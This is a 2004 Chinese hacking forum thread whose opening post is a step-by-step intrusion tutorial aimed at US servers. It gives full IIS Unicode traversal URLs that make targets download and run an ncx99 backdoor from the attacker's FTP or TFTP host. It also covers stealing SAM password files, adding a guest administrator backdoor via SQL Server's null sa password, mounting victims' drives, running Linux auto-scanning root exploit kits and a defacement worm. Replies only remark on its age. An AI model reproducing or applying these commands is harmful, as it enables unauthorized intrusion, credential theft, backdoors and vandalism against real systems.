ABCDV网站

 找回密码
 立即注册

QQ登录

只需一步,快速开始

查看: 1069|回复: 7

简简单单教会你入侵

[复制链接]
发表于 2004-9-2 03:04:03 | 显示全部楼层 |阅读模式
uid=0(root) gid=0(root) group=0(root)


*****1.NT入侵*****

1. 工具下载 (X-Scanner)扫描NT UNICODE漏洞的库我重新更新过!

2. 工具下载(SQLExec.zip)

3. 工具下载 (unicode.zip)

* NT 入侵过程扫描

用X-Scanner扫描美国网段

当然是扫描CGI漏洞,SQL-SERVER默认帐户,NT弱口令。

**************************************NT UNICODE 漏洞***************************************

方法

1.找个可以ftp上传的主机,比如说你以前黑过的,或者是某个可以公用ftp的主机, 把要上传到目标主机上的文件srv.exe传上去(ncx99(在工具下载的unicode.zip里面),用于开个99端口telnet上去) 假如这个ftp主机的ip是:1.1.1.1 username:tom passwd:pass 2,假如你要黑的目标主机的ip是2.2.2.2,先把目标主机的cmd.exe copy成/scripts/ccc.exe,为了方便操作和避免iis加载程序时检测特殊字符出问题。  http://2.2.2.2/scripts/..%c1%1c. ... /cmd.exe?/c copy c:\winnt\system32\cmd.exe d:\inetpub\scripts\ccc.exe 3,编辑一个上传执行文件,再利用ftp -s命令上传文件到scripts目录中。  http://2.2.2.2/scripts/ccc.exe?/c echo open 202.99.168.15 > C:\Inetpub\wwwroot\n3\up.txt  http://2.2.2.2/scripts/ccc.exe?/c echo name >> C:\Inetpub\wwwroot\n3\up.txt  http://2.2.2.2/scripts/ccc.exe?/c echo ****1234 >>C:\Inetpub\wwwroot\n3\up.txt  http://2.2.2.2/scripts/ccc.exe?/ ... htm >>> C:\Inetpub\wwwroot\n3\up.txt  http://2.2.2.2/scripts/ccc.exe?/c echo quit>>C:\Inetpub\wwwroot\n3\up.txt  http://2.2.2.2/scripts/ccc.exe?/c ftp -s:up.txt 4,运行srv.exe,然后就可以telnet上去。  http://2.2.2.2/scripts/srv.exe 之后你就可以telnet 2.2.2.2 99后发现 c:\inetpub\scripts\_ 提示符就在你面前了。 对于NT4,还可以把它的sam._抓下来破解,WIN2000的sam.已没有用了。  http://2.2.2.2/scripts/ccc.exe?/c copy d:\winnt\repair\sam._ d:\inetpub\wwwroot 在用 http://2.2.2.2/sam._把它抓下来,用msdos下的命令 expand sam._ SAM. 把SAM.带回去再用l0pht解开吧。

2.如果你嫌烦的话。在IE里打上 http://xxx.xxx.xxx.xxx/.ida看他的绝对目录!(如果目录为c:\inetpub\wwroot)

只要把他/winnt/system32/cmd.exe拷贝到一个可执行目录并改名为ccc.exe( 如果目录为scripts)

http:/xxx.xxx.xxx.xxx/scripts/ccc.exe?/c echo **** usa > c:\inetpub\wwwroot\default.html

你就把他的主页改为**** us了!

3.关于用unicode上传文件的另一种方法

开始: 现在我们找到的一台漏洞主机:202.100.100.1(假设) 当然下面的调用大家再熟悉不过:  http://202.100.100.1/scripts/..% ... 2/cmd.exe?/c+dir+c:\ 目录被列出,到这,大家都知道,可以修改主页,删除或在服务器上移动一些文件了。 但此时您的权限很低,怎样得到更高得权限呢?方法也有不少,但成功率并不很高。 经过比较,让服务器下载木马的方法较好: 首先,下载 http://www.cners.com/tools/unicode.zip 解压后有如下文件: tftpd32.exe(一个FTP服务器) ncx99.exe(telnet 到99端口) 这两个大家都熟悉吧,其他的不用管。 运行tftpd32.exe 这是一个小巧的FTP服务器,在运行它之前,建议关闭其他FTP服务器,保持tftpd运行,这时你的机器已经是一个FTP服务器了。 回到你的浏览器,在地址栏里填入:  http://202.100.100.1/scripts/..% ... ?? GET ncx99.exe c:\\inetpub\\scripts\\sr.exe ???.???.???.???为你自己的IP,注意:c:\\inetpub\\scripts\\sr.exe 其中c:\\inetpub\\scripts\\为主机服务器目录,要看主机的具体情 况而定,sr.exe为被改名的ncx99.exe(自己选名字吧)。 然后等待...大概3分钟...IE浏览器左下角显示完成,红色漏斗消失,这时ncx99.exe已经上传到主机c:\inetpub\scripts\目录了,您可以自己检查一下。 再使用如下调用来执行ncx99.exe(sr.exe)  http://202.100.100.1/scripts/..% ... tem32/cmd.exe?/c+c:\inetpub\scripts\sr.exe 然后您就可以 telnet 202.100.100.1 99

**************************************SQL SERVER漏洞入侵*************************************

用X-Scanner扫到美国主机1433 sa=null

你就用到工具下载里面的SQLExec.zip了。

解压后。

c:\SQLExec xxx.xxx.xxx.xxx.xxx(美国网站)

-----------------------出现远程命令行的界面 ---------------------------------------------------

SQLCmd>_ 因此!我添加了一个后门帐号!(因为其站上只有一个Adminstrator帐号! 我将Guest用户激活 SQLCmd>net user guest /actives net user guest /active:yes

The command completed successfully. 命令成功执行!!!

SQLCmd>net user guest 123456/*添加后门帐号密码!*/

net user guest 123456 The command completed sucessfully.

SQLCmd>net localgroup administrator guest /add /*将GUEST加入管理员组---当然你也可以该admin密码*/ net lovalgroup administrator guest /add The command completed successfully.

这样你就可以远程登入上去了。当然你的系统是NT !!

C:\ net use \\xxx.xxx.xxx.xxx\ipc$ "123456" /user:"guest"

The command completed sucessfully

登上去了

c:\net use y: \\xxx.xxx.xxx.xxx\c$

The command completed sucessfully

把对方的C盘影射为我们的Y盘。我们访问它的C盘就象访问我们的硬盘一样。找到他的主页目录改了他吧!

**************如果你的系统是98系列

你就要在你系统启动进去98时出现的用户和密码登陆口填上帐号:guest 密码:123456

然后在你的MS-DOS下

c:\net use \\xxx.xxx.xxx.xxx\ipc$ (你不用在这里填写密码帐号了)

The command completed sucessfully (命令成功执行)

下面的方法和前面一样了!!!!

**********************NT弱口令的使用和以上用过ipc登陆上对方主机过程一样*********************


***********************************对美国linux主机的入侵***********************************

首先你的要有个Linux肉鸡。不过你用linux拨号上网的更好!!

工具下载redbind.tgz 针对 bind 8.2 8.2.1 8.2.2 8.2.2-PX

工具下载redseclpd.tgz 针对redhat linux 7.0

工具下载redstatdx.tgz 针对 redhat linux系列

工具下载redftp.tgz 针对 wuftpd 2.6.0

********************举例:redbind.tgz 另外几个工具使用说明差不多 *****************************

用普通账号登陆linux

redcrack$tar xvzf bind.tgz 解压缩

redcrack$cd /redbind 进redbind目录

redcrack$./redbind 208 44就开始扫描208.44 B类网!并自动攻击!

如果攻击到有漏洞的主机 并且溢出成功会自动出来一个root shell

你可以 /usr/sbin/adduser www /*开个www账号*/

/usr/bin/passwd www /*给他加个密码*/

(提高权限的方法是 su.c只要你ftp上传上去 gcc -o su su.c编译一下。再执行一下就变为root了!:-))

想退出shell 就按ctrl+c后继续扫描 (按一次就够多按了会退出扫描的)

如果扫描停顿也可按ctrl+c后继续扫描

提供1i0n编写的蠕虫!!!

使用方法是(在你拿到普通帐号的前提下)

用su.c变为root!

cd到/dev目录 mkdir lib开个lib目录

cp /home/www/1i0n.tgz /dev/lib /*把1i0n.tgz copy到/dev/lib里面*/

tar xvzf 1i0n.tgz 后执行./1i0n.sh

替换掉他的主页了!!
发表于 2004-9-2 04:04:58 | 显示全部楼层
god, das ist aber 3 Jahre alt!
回复 支持 反对

使用道具 举报

发表于 2004-9-2 04:08:46 | 显示全部楼层
回复 支持 反对

使用道具 举报

 楼主| 发表于 2004-9-2 04:26:57 | 显示全部楼层
最初由 Admin 发表
[B]god, das ist aber 3 Jahre alt! [/B]

谁说的?
回复 支持 反对

使用道具 举报

发表于 2004-9-2 10:38:15 | 显示全部楼层
冒昧的问一下,如果对方关机了,我怎么侵入?
回复 支持 反对

使用道具 举报

发表于 2004-9-2 16:01:44 | 显示全部楼层
好老的文章。。。。
回复 支持 反对

使用道具 举报

发表于 2004-9-2 16:08:00 | 显示全部楼层
最初由 麻烦 发表
[B]冒昧的问一下,如果对方关机了,我怎么侵入? [/B]


砸开大门

打开机器
回复 支持 反对

使用道具 举报

发表于 2004-9-2 17:57:26 | 显示全部楼层
嗬嗬,楼上的,你的“来自”填得很有意思啊。不过微笑好像应该是smile哦?
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|手机版|Archiver|ABCDV网站,版权所有:北京佳景时代文化有限公司 ( 京ICP备19037940号-1 |||| 京公网安备11010802012322 |||| 工信查询网址: https://www.beian.miit.gov.cn )

GMT+8, 2024-11-25 04:48 , Processed in 0.074344 second(s), 20 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表